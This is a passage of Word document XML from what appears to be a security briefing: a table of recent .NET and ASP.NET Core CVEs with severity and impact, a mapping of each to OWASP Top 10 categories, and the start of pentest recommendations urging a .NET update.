                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Severity (CVSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58338901">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Impact &amp; Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D700F60">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6476DEE0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>CVE-2025-55315</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F51193B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">A flaw in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://ASP.NET" \t "_blank" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>ASP.NET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> Core's HTTP request handling allows for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>HTTP Request/Response Smuggling</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2541CED1">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>9.9 (Critical)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68A7EE5B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>An authorized attacker can bypass security features. This can lead to privilege escalation, Server-Side Request Forgery (SSRF), Cross-Site Request Forgery (CSRF), and injection attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7A800C74">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F0A8216">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>CVE-2025-24070</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="712D3FE9">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">A vulnerability exists in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://ASP.NET" \t "_blank" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>ASP.NET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> Core's RefreshSignInAsync method. An attacker can improperly authenticate a user and sign into another user's account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FF9B724">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>7.0 (High)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59F3D6B0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">This is a classic </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Elevation of Privilege</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> vulnerability. An attacker can compromise user accounts and impersonate legitimate users. The attack complexity is high.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="44E53ED1">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D6ABB46">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>CVE-2025-26646</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="229F2D18">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">A </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>spoofing vulnerability</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> in .NET and Visual Studio allows an attacker to impersonate a legitimate user or service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F91C231">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>(Not specified, but labeled "Critical")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25D3AECA">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>This can lead to unauthorized access and data breaches, as attackers can bypass standard authentication and identity checks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="668F91BF">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29A7C40D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>CVE-2025-55248</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2418DE52">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">An </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Information Disclosure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> vulnerability where a MITM attacker can force a client to send data over an unencrypted SMTP connection instead of TLS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6915C116">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">8.2 (High) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="029D45E8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>An attacker on the same network can intercept sensitive credentials or email content sent by your application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52FB93A1">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CD73CA2">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>CVE-2025-55247</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="583DE113">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">A </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Denial of Service (DoS)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> vulnerability in MSBuild's temporary directory handling on Linux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58F08804">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">8.5 (High) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E9EF3CC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>A local, authenticated attacker can manipulate temporary paths to cause build failures, making this more relevant for CI/CD build servers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="185B5C03">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How This Maps to OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E58E60">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>These .NET-specific vulnerabilities are not new classes of bugs; they map directly to traditional risks from the OWASP Top 10, which remains the global standard for web application security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18939D98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>HTTP Request Smuggling (CVE-2025-55315)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> falls under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>A1: Broken Access Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>. By smuggling a request, the attacker bypasses security controls to access data or perform actions they shouldn't be allowed to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721183D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Elevation of Privilege (CVE-2025-24070)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Spoofing (CVE-2025-26646)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> primarily fall under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>A1: Broken Access Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>A7: Identification and Authentication Failures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>. These vulnerabilities directly break the mechanisms that verify a user is who they claim to be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FBD514">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Information Disclosure (CVE-2025-55248)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a classic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>A2: Cryptographic Failures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> scenario. The application's failure to enforce encrypted communication (TLS) exposes sensitive data in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2A3169">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Actionable Recommendations for Your Pentest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B67E7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Update Your .NET Version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">: This is the single most effective step. Ensure you are running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>.NET SDK 9.0.103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or later) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>.NET Runtime 9.0.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
